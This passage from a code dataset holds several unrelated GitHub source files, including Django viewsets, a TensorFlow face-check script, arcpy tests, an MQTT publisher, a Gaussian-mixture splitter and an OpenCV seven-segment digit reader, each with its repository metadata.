player\n self.id = globalID # self -> id dla konkretnego obiektu\n def calculateBMI(self):\n return self.weight/pow(self.height/100,2)\n def __str__(self):\n global globalID #odczyt wartości globalnej w skrypcie\n return (\"| %3d |%10s | %10s | %10s | %10d | %10d | %f10.2\"\n % (self.id,\n self.name,\n self.lastname,\n self.repr,\n self.weight,\n self.height,\n self.calculateBMI()))\n\np1 = Player(\"Adam\", \"Małysz\", \"Pol\", 50, 165)\np2 = Player(\"Kamil\", \"Stoch\", \"Pol\", 75, 183)\np3 = Player(\"Jan\", \"rus\", \"Pol\", 70, 150)\np4 = Player(\"tata\", \"srata\", \"Pol\", 45, 167)\n\nprint(p1)\nprint(p2)\nprint(p3)\nprint(p4)\n\nplayers = [p1,p2,p3,p4]\ndef getPlayers():\n for player in players:\n print(player)\n\ndef findPlayerById(findId):\n for player in players:\n if(player.id == findId):\n print(player)\nprint()\nfindPlayerById(1)\n","repo_name":"andrzeji-oss/kursp","sub_path":"dzien4/dzien4_12.py","file_name":"dzien4_12.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23996167442","text":"import tensorflow as tf\nimport cv2\nimport dlib\nimport numpy as np\nimport os\nimport random\nimport sys\nfrom sklearn.model_selection import train_test_split\n\nsize = 64\n\nx = tf.placeholder(tf.float32, [None, size, size, 3])\n\nkeep_prob_5 = tf.placeholder(tf.float32)\nkeep_prob_75 = tf.placeholder(tf.float32)\n\ndef weightVariable(shape):\n init = tf.random_normal(shape, stddev=0.01)\n return tf.Variable(init)\n\ndef biasVariable(shape):\n init = tf.random_normal(shape)\n return tf.Variable(init)\n\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1,1,1,1], padding='SAME')\n\ndef maxPool(x):\n return tf.nn.max_pool(x, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\ndef dropout(x, keep):\n return tf.nn.dropout(x, keep)\n\ndef cnnLayer():\n # 第一层\n W1 = weightVariable([3,3,3,32]) # 卷积核大小(3,3), 输入通道(3), 输出通道(32)\n b1 = biasVariable([32])\n # 卷积\n conv1 = tf.nn.relu(conv2d(x, W1) + b1)\n # 池化\n pool1 = maxPool(conv1)\n # 减少过拟合,随机让某些权重不更新\n drop1 = dropout(pool1, keep_prob_5)\n\n # 第二层\n W2 = weightVariable([3,3,32,64])\n b2 = biasVariable([64])\n conv2 = tf.nn.relu(conv2d(drop1, W2) + b2)\n pool2 = maxPool(conv2)\n drop2 = dropout(pool2, keep_prob_5)\n\n # 第三层\n W3 = weightVariable([3,3,64,64])\n b3 = biasVariable([64])\n conv3 = tf.nn.relu(conv2d(drop2, W3) + b3)\n pool3 = maxPool(conv3)\n drop3 = dropout(pool3, keep_prob_5)\n\n # 全连接层\n Wf = weightVariable([8*16*32, 512])\n bf = biasVariable([512])\n drop3_flat = tf.reshape(drop3, [-1, 8*16*32])\n dense = tf.nn.relu(tf.matmul(drop3_flat, Wf) + bf)\n dropf = dropout(dense, keep_prob_75)\n\n # 输出层\n Wout = weightVariable([512,2])\n bout = biasVariable([2])\n out = tf.add(tf.matmul(dropf, Wout), bout)\n return out\n\noutput = cnnLayer() \npredict = tf.argmax(output, 1) \n \nsaver = tf.train.Saver() \nsess = tf.Session() \nsaver.restore(sess, tf.train.latest_checkpoint(r'E:\\VS\\QT\\AI\\x64\\Release\\FaceDetection\\checkpoint')) \n \ndef is_my_face(image): \n res = sess.run(predict, feed_dict={x: [image/255.0], keep_prob_5:1.0, keep_prob_75: 1.0}) \n if res[0] == 1: \n return True \n else: \n return False \n\n#使用dlib自带的frontal_face_detector作为我们的特征提取器\n# detector = dlib.get_frontal_face_detector()\nhaar = cv2.CascadeClassifier(r'D:\\soft\\study\\opencv\\opencv\\build\\install\\etc\\haarcascades\\haarcascade_frontalface_default.xml')\ncam = cv2.VideoCapture(0) \n\ndef detection_face():\n\tisDetect = True\n\twhile isDetect:\n\t\t_, img = cam.read()\n\t\tgray_image = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\t\tfaces = haar.detectMultiScale(gray_image, 1.3, 5)\n\t\tcv2.imshow('img', img)\n\t\tkey = cv2.waitKey(30) & 0xff\n\t\tif key == 27:\n\t\t\tsys.exit(0)\n\t\t\t\t\n\t\tfor f_x, f_y, f_w, f_h in faces:\n\t\t\tface = img[f_y:f_y+f_h, f_x:f_x+f_w]\n\t\t\tface = cv2.resize(face, (size,size))\n\t\t\tif is_my_face(face):\n\t\t\t\tisDetect = False\n\t\t\t\tbreak\n\t\t\t# cv2.rectangle(img, (x2,x1),(y2,y1), (255,0,0),3)\n\t\t\t# cv2.imshow('image',img)\n\t\t\t# key = cv2.waitKey(30) & 0xff\n\t\t\t# if key == 27:\n\t\t\t\t# sys.exit(0)\n\t\t\t\t\n\tsess.close() \n \ndetection_face()","repo_name":"mrcao20/AI","sub_path":"AI/FaceDetection/is_my_face.py","file_name":"is_my_face.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33633041336","text":"import os\nimport sys\nimport shutil\nimport unittest\nimport datetime\n\nimport arcpy\n\nimport amaptor\nimport geodatabase_tempfile\n\nimport scripts.exceptions\nfrom arcproject import scripts\nfrom arcproject.scripts import mapping\nfrom arcproject.waterquality import classes\nfrom arcproject.scripts import config\n\nfolder_path = os.path.dirname(os.path.abspath(__file__))\n\nclass BaseMapTest(unittest.TestCase):\n\tdef setUp(self):\n\t\tself.session = classes.get_new_session()\n\t\tself.query = self.session.query(classes.WaterQuality).filter(classes.WaterQuality.site_id == 1)\n\t\tself.output = os.path.join(folder_path, \"test_export_folder\", \"test_wq.shp\")\n\n\tdef test_query_to_shp(self):\n\n\t\t# clean up before test\n\t\tif arcpy.Exists(self.output):\n\t\t\tarcpy.Delete_management(self.output)\n\n\t\tmapping.query_to_features(self.query, self.output)\n\n\tdef test_mapping_by_date(self):\n\t\tdate_with_records = datetime.datetime.strptime(\"04/04/2013\", \"%m/%d/%Y\")\n\t\tdate_without_records = datetime.datetime.strptime(\"01/01/2012\", \"%m/%d/%Y\")\n\n\t\tmapping.layer_from_date(date_with_records, os.path.join(folder_path, \"test_export_folder\", \"test_export_for_date.shp\"))\n\n\t\tself.assertRaises(scripts.exceptions.NoRecordsError, mapping.layer_from_date, date_without_records, os.path.join(\"test_export_folder\", \"test_export_for_date.shp\"))\n\n\nclass TestMakeNewMap(unittest.TestCase):\n\tdef test_pro_new_map(self):\n\n\t\tif amaptor.ARCMAP: # this test is ArcGIS Pro specific\n\t\t\treturn\n\n\t\ttoolbox_path = os.path.join(folder_path, \"arcproject_toolbox.py\")\n\t\tshutil.copyfile(os.path.join(config.arcwqpro, \"wq-processing-toolbox.pyt\"), toolbox_path)\n\t\tsys.path.append(folder_path)\n\n\t\timport arcproject_toolbox\n\t\tarcproject_toolbox.testing_project = os.path.join(folder_path, \"testfiles\", \"blank_pro_project_working.aprx\")\n\t\ttry:\n\t\t\tshutil.copyfile(os.path.join(folder_path, \"testfiles\", \"blank_pro_project.aprx\"), arcproject_toolbox.testing_project)\n\n\t\t\tclass param(object):\n\t\t\t\tdef __init__(self, value=None):\n\t\t\t\t\tself.valueAsText = str(value)\n\t\t\t\t\tself.value = value\n\n\t\t\ttool = arcproject_toolbox.GenerateMap()\n\n\t\t\tparams = [param(2016), param(\"May\"), param(\"CHL\"), param(\"testing_map\"), param(), param()]\n\t\t\ttool.execute(parameters=params, messages=None)\n\t\tfinally:\n\t\t\tos.remove(toolbox_path)\n\t\t\tos.remove(arcproject_toolbox.testing_project)\n\n\nif __name__ == '__main__':\n\tunittest.main()\n","repo_name":"ucd-cws/arcproject-wq-processing","sub_path":"arcproject/scripts/tests/test_mapping.py","file_name":"test_mapping.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"27273822150","text":"#Needed because powershell ConvertFrom-Json is dumb and treats 'A' and 'a' as the same.\n\nfrom pokedata import Sprite\n\nclass Font:\n def __init__(self,addr,char):\n self.addr = addr\n self.char = char\n self.sprite = Sprite.decode1BPP(addr,1,1)\n\n def to_json(self):\n return {\n 'char' : self.char,\n 'sprite' : self.sprite.to_json()\n }","repo_name":"super-phreak/poshmon","sub_path":"poshmon-tools/font.py","file_name":"font.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"32117783165","text":"import json\n\nfrom drf_yasg import openapi\nfrom rest_framework import viewsets, status\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom django.contrib.gis.geos import Point\n\nfrom providers_service_area.models import Provider, ServiceArea\nfrom providers_service_area.serializers import ProviderSerializer, ServiceAreaSerializer, ResultsSerializer\n\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.cache import cache_page\nfrom drf_yasg.utils import swagger_auto_schema\n\n\n\n@method_decorator(name='list',\n decorator=swagger_auto_schema(\n operation_description=\"List All Providers\",\n operation_summary=\"list\")\n )\n@method_decorator(name='create',\n decorator=swagger_auto_schema(\n operation_description=\"Create new Provider\",\n operation_summary=\"create\")\n )\n@method_decorator(name='retrieve',\n decorator=swagger_auto_schema(\n operation_description=\"Retrieve Provider by id\",\n operation_summary=\"retrieve\")\n )\n@method_decorator(name='update',\n decorator=swagger_auto_schema(\n operation_description=\"Update Provider by id\",\n operation_summary=\"update\")\n )\n@method_decorator(name='destroy',\n decorator=swagger_auto_schema(\n operation_description=\"Destroy Provider by id\",\n operation_summary=\"destroy\")\n )\n@method_decorator(name='partial_update',\n decorator=swagger_auto_schema(auto_schema=None)\n )\n\nclass ProviderViewSet(viewsets.ModelViewSet):\n \"\"\"\n Provider Resource\n\n This viewset automatically provides `list`, `create`, `retrieve`,\n `update` and `destroy` actions.\n \"\"\"\n serializer_class = ProviderSerializer\n queryset = Provider.objects.all()\n\n@method_decorator(name='list',\n decorator=swagger_auto_schema(\n operation_description=\"List All Service Areas\",\n operation_summary=\"list\")\n )\n@method_decorator(name='create',\n decorator=swagger_auto_schema(\n operation_description=\"Create new Service Area\",\n operation_summary=\"create\")\n )\n@method_decorator(name='retrieve',\n decorator=swagger_auto_schema(\n operation_description=\"Retrieve Service Area by id\",\n operation_summary=\"retrieve\")\n )\n@method_decorator(name='update',\n decorator=swagger_auto_schema(\n operation_description=\"Update Service Areas by id\",\n operation_summary=\"update\")\n )\n@method_decorator(name='destroy',\n decorator=swagger_auto_schema(\n operation_description=\"Destroy Service Area by id\",\n operation_summary=\"destroy\")\n )\n@method_decorator(name='partial_update',\n decorator=swagger_auto_schema(auto_schema=None)\n )\nclass ServiceAreaViewSet(viewsets.ModelViewSet):\n \"\"\"\n Service Area Resource\n\n This viewset automatically provides `list`, `create`, `retrieve`,\n `update` and `destroy` actions.\n \"\"\"\n serializer_class = ServiceAreaSerializer\n queryset = ServiceArea.objects.all()\n\n # Cache Request for 2 hours\n long = openapi.Parameter('long', in_=openapi.IN_QUERY, description='string', type=openapi.TYPE_STRING,)\n lat = openapi.Parameter('lat', in_=openapi.IN_QUERY, description='string', type=openapi.TYPE_STRING,)\n\n\n @swagger_auto_schema(operation_id=\"get_providers_in_the_area\",\n manual_parameters=[lat, long],\n responses={200: ResultsSerializer(many=True)},\n operation_summary=\"\")\n @method_decorator(cache_page(60 * 60 * 2))\n @action(detail=False, methods=['get'], name=\"Get providers in the area\")\n def get_providers_in_the_area(self, request):\n \"\"\"\n Endpoint that takes a lat/lng pair as arguments and return a list of all polygons that include the given lat/lng\n \"\"\"\n x_coords = request.GET.get('long', None)\n y_coords = request.GET.get('lat', None)\n if x_coords and y_coords:\n location = Point(float(x_coords), float(y_coords), srid=4326)\n providers_in_the_area = ServiceArea.objects.filter(area__contains=location)\n serialized = ResultsSerializer(providers_in_the_area, many=True)\n return Response(serialized.data, status=status.HTTP_200_OK)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"ineedme/mozio","sub_path":"providers_service_area/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25209263383","text":"import random\nimport requests\nimport http.client\nimport numpy as np\nfrom flask import Flask\nfrom flask import request, escape, render_template\n\napp = Flask(__name__)\n\ndef getData(ID, ID_Data):\n \"\"\" Converts the data sent by the server into the original message\n\n Parameters\n ----------\n ID : list(:float)\n ID of the client\n ID_Data: list(:float)\n Array containing ID embedded with data\n\n Returns\n -------\n str\n The data which was published by the client with the specified ID\n\n \"\"\"\n # print(ID_Data)\n # print(ID)\n data = np.multiply(np.array(ID_Data) - np.array(ID), np.array(ID))\n curr = \"\"\n data[np.isclose(data, -1)] = 0\n # print(data)\n dataBinary = []\n for i in range(len(data)):\n \n if i and i % 8 == 0:\n dataBinary.append(curr)\n curr = \"\"\n curr += str(int(data[i]))\n print(dataBinary)\n dataString1 = list(map(lambda x: chr(int(x, 2)), dataBinary))\n return \"\".join(dataString1)\n\ndef fetchDataFromPubServer(ID_arr):\n \"\"\" Sends the client ID to the Pub/Sub server to fetch the published data\n\n Parameters\n ----------\n ID_arr : list(:float)\n ID of the client\n\n Returns\n -------\n str\n The data which was published by the client with the sppecified ID\n\n \"\"\"\n pubSubURL = \"http://localhost:7001/fetchData\"\n myData = {\"ID\": ID_arr}\n clientIDData = requests.post(pubSubURL, json=myData).json()[\"data\"]\n print(clientIDData)\n if clientIDData:\n data = getData(ID_arr, clientIDData)\n else:\n data = None\n print(data)\n return data\n\ndef fetchIDFromClientURL(clientURL: str):\n \"\"\" Fetches Client ID from the specified client URL\n\n Parameters\n ----------\n clientURL : str\n URL of the client to fetch ID from\n\n Returns\n -------\n list(:float)\n A float array containing the ID\n\n \"\"\"\n conn = http.client.HTTPConnection(clientURL)\n conn.request('GET', '/')\n\n resp = conn.getresponse()\n content = resp.read()\n\n conn.close()\n\n text = content.decode('utf-8')\n\n ID_arr = text.split(\" \")\n ID_arr = list(map(float, ID_arr))\n return ID_arr\n\n\n@app.route(\"/\")\ndef index():\n \"\"\"\n The function index is a callback for when a user lands on the homepage URL: 127.0.0.1:6001\n\n It loads an input form to enter the URL of the client. It then fetched the ID from that URL\n and queries the Publish Subscribe server to fetch the Data\n \"\"\"\n clientURL = request.args.get(\"ClientURL\", \"\")\n data = \"\"\n if clientURL:\n ID_arr = fetchIDFromClientURL(clientURL)\n data = fetchDataFromPubServer(ID_arr)\n # return (\n # \"\"\"
\n # \n # \n #
\"\"\"\n # + clientURL\n # + (data if data else \"No client data found\")\n # )\n\n return render_template(\"index.html\", data=data)\n\nif __name__ == \"__main__\":\n app.run(host=\"127.0.0.1\", port=6001, debug=True)\n","repo_name":"mahnoormmalik/client-receiver","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39483890951","text":"\nclass Solution:\n def strStr(self, haystack: str, needle: str) -> int:\n j=0\n ans=-1\n if(len(haystack) tuple:\n\n X_list = [] # create an empty list to store the features\n Y_list = [] # create an empty list to store the labels\n df = pd.read_csv(data_path) # read the data from the specified file\n for index in df.index: # loop over each row in the data frame\n X_piece = np.array(df.loc[index,['X','Y','1th','day','FFMC','DMC','DC','ISI','temp','RH','wind','rain',]]) # extract the features as a numpy array\n X_list.append(X_piece) # append the features to the list\n Y_piece = int(df.loc[index,['area']]) # extract the label\n Y_list.append(Y_piece) # append the label to the list\n\n X = np.array(X_list) # convert the list of features to a numpy array\n\n #######################################################################\n #### 2023.3.29 update: normalize the data, so that each dimension has zero mean and unit variance\n #######################################################################\n if is_normalized: # if the normalize flag is set to True\n for i in range(0, X.shape[-1]):\n X[:, i] = (X[:, i] - X[:, i].mean()) / X[:, i].std()\n #######################################################################\n\n if is_bias: # if the bias flag is set to True\n X = np.concatenate([np.ones((len(X_list),1)),X],axis=1).astype(np.float32) # add a column of ones to the features as the bias term\n else: # if the bias flag is set to False\n X = X.astype(np.float32) # cast the features as a float32 numpy array\n Y = np.array(Y_list,dtype=np.float32) # convert the list of labels to a float32 numpy array\n Y = np.log(Y+1) # apply logarithmic transformation to the labels\n\n #shuffle\n if is_shuffle: # if the shuffle flag is set to True\n indexes = np.arange(0,len(X),1,dtype=np.int32) # create an array of indexes for the samples\n np.random.shuffle(indexes) # shuffle the indexes randomly\n X = X[indexes] # shuffle the features based on the shuffled indexes\n Y = Y[indexes] # shuffle the labels based on the shuffled indexes\n\n # print(X.mean())\n # print(X.var())\n\n X_train = X[:train_sample_num] # extract the training features from the beginning of the numpy array\n Y_train = Y[:train_sample_num] # extract the training labels from the beginning of the numpy array\n X_test = X[-test_sample_num:] # extract the testing features from the end of the numpy array\n Y_test = Y[-test_sample_num:] # extract the testing labels from the end of the numpy array\n\n return X_train,X_test,Y_train,Y_test # return the training and testing features and labels as a tuple\n","repo_name":"nantsing/LinearModelRegression","sub_path":"dataset/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"14032262180","text":"from enum import Enum\n\nclass BookEnum(Enum):\n Available = 0\n Reserved = 1\n CheckedOut = 2\n \nclass Book:\n def __init__(self, id, title, author, status = BookEnum.Available):\n self.id = id\n self.title = title\n self.author = author\n self.status = status\n \n def reserve(self):\n self.status = BookEnum.Reserved\n \n def checkout(self):\n self.status = BookEnum.CheckedOut\n \n def returnBook(self):\n self.status = BookEnum.Available\n \nbooks = [\n Book(1, 'Harry Potter', 'JK Rowling', BookEnum.Available),\n Book(2, 'Golden Compass', 'Christopher Paoli', BookEnum.Reserved),\n Book(3, 'Dumbledore Dinner', 'JK Rowling', BookEnum.Available),\n Book(4, 'Lord of the Rings', 'Einstein', BookEnum.Available),\n Book(5, 'Toy Story', 'Disneyworld', BookEnum.CheckedOut),\n Book(6, 'Dune', 'Henry Ford', BookEnum.Available),\n Book(7, 'Random Age', 'Neil Pink', BookEnum.Available),\n]","repo_name":"AlexanderDLe/Python_DataStructuresAndAlgorithms","sub_path":"ObjectOrientation/LibraryManagementSystem/Book.py","file_name":"Book.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14536629114","text":"from datetime import datetime\nimport ElasticEmail\nfrom ElasticEmail.api import statistics_api\nfrom pprint import pprint\n\n# Defining the host is optional and defaults to https://api.elasticemail.com/v4\nconfiguration = ElasticEmail.Configuration()\n\n# Configure API key authorization: apikey\nconfiguration.api_key['apikey'] = 'YOUR_API_KEY'\n\n\"\"\"\nLoad statistics\nExample api call that loads basic statistics.\n\"\"\"\nwith ElasticEmail.ApiClient(configuration) as api_client:\n # Create an instance of the API class\n api_instance = statistics_api.StatisticsApi(api_client)\n \n _from = datetime(2022,1,1,00,00,00) # datetime | Starting date for search in YYYY-MM-DDThh:mm:ss format.\n to = datetime(2022,1,30,00,00,00) # datetime | Ending date for search in YYYY-MM-DDThh:mm:ss format. (optional)\n\n # only from date:\n try:\n # Load Statistics\n api_response = api_instance.statistics_get(_from)\n print(\"From %s\" % _from)\n pprint(api_response)\n except ElasticEmail.ApiException as e:\n print(\"Exception when calling StatisticsApi->statistics_get: %s\\n\" % e)\n\n # from and to dates:\n try:\n api_response = api_instance.statistics_get(_from, to=to)\n print(f\"\\nFrom {_from} To {to}\")\n pprint(api_response)\n except ElasticEmail.ApiException as e:\n print(\"Exception when calling StatisticsApi->statistics_get: %s\\n\" % e)","repo_name":"ElasticEmail/elasticemail-python","sub_path":"examples/functions/loadStatistics.py","file_name":"loadStatistics.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"31596143672","text":"#!/usr/bin/env python\nfrom setuptools import setup\nfrom setuptools.command.test import test as TestCommand\nimport sys\nimport io\n\nclass PyTest(TestCommand):\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = ['tests']\n self.test_suite = True\n def run_tests(self):\n #import here, cause outside the eggs aren't loaded\n import pytest\n errno = pytest.main(self.test_args)\n sys.exit(errno)\n\nsetup(\n name='eece411-kvclient',\n version='0.1.0',\n url='',\n license=io.open('LICENSE').read(),\n author='Tyler Jones',\n author_email='tyler@squirly.ca',\n description='Key Value client for EECE 411.',\n long_description=io.open('README.rst').read(),\n packages=['kvclient'],\n install_requires=[],\n tests_require=['pytest', 'mock'],\n cmdclass={'test': PyTest},\n)\n","repo_name":"rockyhe/rockykevinleon","sub_path":"eece411/phase2/src/phase2Pack/eece411-kvclient/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16900622637","text":"import time\nimport os\nimport sys\nimport paho.mqtt.client as mqtt\nimport threading\nfrom datetime import datetime\n\nclass MqttPublisher(threading.Thread):\n def __init__(self, logging, broker=\"localhost\", port=1883):\n self.logging = logging\n\n threading.Thread.__init__(self)\n\n self.broker = broker\n self.port = port\n self.client = mqtt.Client()\n # self.client.on_publish = self.on_publish\n\n def run(self):\n while True:\n try:\n self.logging.info(\"Attempting to connect to MttqPublisher on {}:{}\".format(self.broker, self.port))\n self.client.connect(self.broker, self.port)\n self.client.loop_start()\n except OSError as err:\n print(\"OS error: {0}\".format(err))\n except Exception as err:\n self.logging.info(\"... Failed to connect. Try again in 10s {0}\".format(err))\n\n time.sleep(10)\n\n def publish(self, topic, msg):\n now = datetime.utcnow()\n payload = \"{},{}\".format(now.strftime(\"%Y-%m-%d %H:%M:%S.%f\"), msg)\n\n self.client.publish(topic, payload=payload, qos=1, retain=True)\n # self.logging.info(\"MttqPublisher sending: {} for topic: {}\".format(payload, topic))\n\n def on_publish(self, client, userdata, mid):\n # self.logging.info(\"Mttq published!\")\n pass\n","repo_name":"matzpersson/fleetmetrics","sub_path":"simulator/lib/Mqtt.py","file_name":"Mqtt.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8385505579","text":"import numpy as np\r\nimport numpy.linalg as nplnalg\r\nimport scipy.linalg as sclnalg\r\nfrom uq.quadratures import cubatures as uqcub\r\nfrom uq.gmm import gmmbase as uqgmmbase\r\nfrom uq.gmm import splitter as uqsplit\r\n\r\ndef splitGMM_ryanruss(gmm,f,N,ruleoption,maxlvl):\r\n # f is the nonlinear function\r\n # max number of times to split: maxlvl\r\n for mxl in range(maxlvl):\r\n h = np.sqrt(3)\r\n Ncmop = gmm.Ncomp\r\n G = uqgmmbase.GMM(None,None,None,gmm.currt)\r\n for i in range(Ncmop):\r\n fmu = f(gmm.m(i))\r\n S = sclnalg.sqrtm(gmm.P(i))\r\n invS = nplnalg.inv(S)\r\n phi=[0]*S.shape[1]\r\n for j in range(S.shape[1]):\r\n avec = S[:,j]\r\n avecnorm = avec/nplnalg.norm(avec)\r\n avecnormMag = 1/nplnalg.norm(np.matmul(invS,avecnorm))\r\n phi[j] = ( f(gmm.m(i)+h*avecnormMag*avecnorm)+f(gmm.m(i)-h*avecnormMag*avecnorm)-2*fmu )/(2*h**2)\r\n \r\n phinorms = [nplnalg.norm(phi[e]) for e in range(S.shape[1])]\r\n # print(phinorms)\r\n j=np.argmax(phinorms)\r\n avec = S[:,j]\r\n gmmcomp=uqsplit.splitGaussianND_principleAxis_ryanruss(avec,gmm.m(i),gmm.P(i),N,ruleoption)\r\n gmmcomp.currt = gmm.currt\r\n gmmcomp.scaleWt(gmm.w(i))\r\n G.appendGMM(gmmcomp)\r\n \r\n gmm = G\r\n \r\n return gmm\r\n\r\n","repo_name":"nadurthi/ResearchCodes","sub_path":"turtlebot/uq/gmm/gmmsplitteralgos.py","file_name":"gmmsplitteralgos.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32886604081","text":"from django import forms\nfrom .models import CSVData, Question, Answer\n\nclass UploadCSVForm(forms.ModelForm):\n csv_file = forms.FileField()\n\n class Meta:\n model = CSVData\n fields = ['csv_file']\n\nclass QuestionForm(forms.ModelForm):\n class Meta:\n model = Question\n fields = ['question_text', 'question_type']\n\nclass AnswerForm(forms.ModelForm):\n class Meta:\n model = Answer\n fields = [] # Start with an empty list of fields\n\n def __init__(self, *args, csv_data_id=None, **kwargs):\n super().__init__(*args, **kwargs)\n if csv_data_id:\n questions = Question.objects.filter(csv_data_id=csv_data_id)\n for question in questions:\n field_name = f'question_{question.id}'\n self.fields[field_name] = forms.CharField(\n label=question.question_text, required=True\n )","repo_name":"morisy/crowdpleaser","sub_path":"crowdsourcing_app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26021409346","text":"import cv2\r\nimport imutils\r\nfrom imutils.perspective import four_point_transform\r\nfrom imutils import contours\r\n\r\n#define the dictionary of 7-segment display\r\nDIGITS_LOOKUP = {\r\n (1,1,1,0,1,1,1):0,\r\n (0,0,1,0,0,1,0):1,\r\n (1,0,1,1,1,1,0):2,\r\n (1,0,1,1,0,1,1):3,\r\n (0,1,1,1,0,1,0):4,\r\n (1,1,0,1,0,1,1):5,\r\n (1,1,0,1,1,1,1):6,\r\n (1,0,1,0,0,1,0):7,\r\n (1,1,1,1,1,1,1):8,\r\n (1,1,1,1,0,1,1):9,\r\n }\r\n#image pre-processing\r\nimg = cv2.imread('digitRecognition.jpg')\r\nimg = imutils.resize(img,height = 500)\r\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\nblurred = cv2.GaussianBlur(img,(5,5),0)\r\nedged = cv2.Canny(blurred,50,200)\r\n#cv2.imshow('image',img)\r\n#cv2.imshow('edged',edged)\r\n\r\n#find contours and sort them acc to their size in decreasing order\r\ncnts = cv2.findContours(edged.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\ncnts = imutils.grab_contours(cnts)\r\ncnts = sorted(cnts,key=cv2.contourArea,reverse=True)\r\ndisplayCnt = None\r\nfor c in cnts:\r\n #contour approximation\r\n peri = cv2.arcLength(c,True)\r\n approx = cv2.approxPolyDP(c,0.02*peri,True)\r\n #if contour has 4 vertices,we have found the digital display\r\n if len(approx) == 4:\r\n displayCnt = approx\r\n break\r\n#extract display\r\nwarped = four_point_transform(gray,displayCnt.reshape(4,2))\r\noutput = four_point_transform(img,displayCnt.reshape(4,2))\r\n#cv2.imshow('warped',warped)\r\n#threshold the image and apply morphlogical transforms to clean-up the image\r\nthresh = cv2.threshold(warped,127,255,cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]\r\nkernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(1,5))\r\nthresh = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel)\r\n#cv2.imshow('thresholded',thresh)\r\n#find contours in the thresholded image and initialize the digit contour list\r\ncnts = cv2.findContours(thresh.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\ncnts = imutils.grab_contours(cnts)\r\ndigitCnts = []\r\nfor c in cnts:\r\n #bounding box of the contour\r\n (x,y,w,h) = cv2.boundingRect(c)\r\n #if box is in the respective range then it is a digit\r\n if w>=15 and (h>=30 and h<=40):\r\n digitCnts.append(c)\r\n#initialize the digit contour list and place in the order\r\ndigitCnts = contours.sort_contours(digitCnts,method = \"left-to-right\")[0]\r\ndigits = []\r\n#loop for each digit\r\nfor c in digitCnts:\r\n #set ROI of each digit\r\n (x,y,w,h) = cv2.boundingRect(c)\r\n roi = thresh[y:y+h,x:x+w]\r\n #set dimensions of each digit\r\n (roiH,roiW) = roi.shape\r\n (dW,dH) = (int(roiW*0.25),int(roiH*0.15))\r\n dHC = int(roiH*0.05)\r\n #define the 7-segments\r\n segments = [\r\n ((0,0),(w,dH)), #top\r\n ((0,0),(dW,h//2)), #top-left\r\n ((w - dW,0),(w,h//2)), #top-right\r\n ((0,(h//2)-dHC),(w,(h//2)+dHC)), #center\r\n ((0,h//2),(dW,h)), #bottom-left\r\n ((w-dW,h//2),(w,h)), #bottom-right\r\n ((0,h-dH),(w,h)) #bottom\r\n ]\r\n #look if the segment is on/off\r\n on = [0]*len(segments)\r\n #lookup for each digit in ROI\r\n for (i,((xA,yA),(xB,yB))) in enumerate(segments):\r\n segROI = roi[yA:yB,xA:xB]\r\n total = cv2.countNonZero(segROI)\r\n area = (xB - xA)*(yB - yA)\r\n if total/float(area) > 0.5:\r\n on[i] = 1\r\n digit = DIGITS_LOOKUP[tuple(on)]\r\n digits.append(digit)\r\n cv2.rectangle(output,(x,y),(x+w,y+h),(0,255,0),1)\r\n cv2.putText(output,str(digit),(x - 10,y - 10),cv2.FONT_HERSHEY_SIMPLEX,0.65,(0,255,0),2)\r\n \r\nprint(u\"{}{}.{}\\u00b0c\".format(*digits))\r\ncv2.imshow(\"INPUT\",img)\r\ncv2.imshow(\"OUTPUT\",output)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n\r\n \r\n \r\n","repo_name":"ShubhamJagtap2000/OpenCV-Python","sub_path":"DigitRecognitionProject.py","file_name":"DigitRecognitionProject.py","file_ext":"py","file_size_in_byte":3603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} 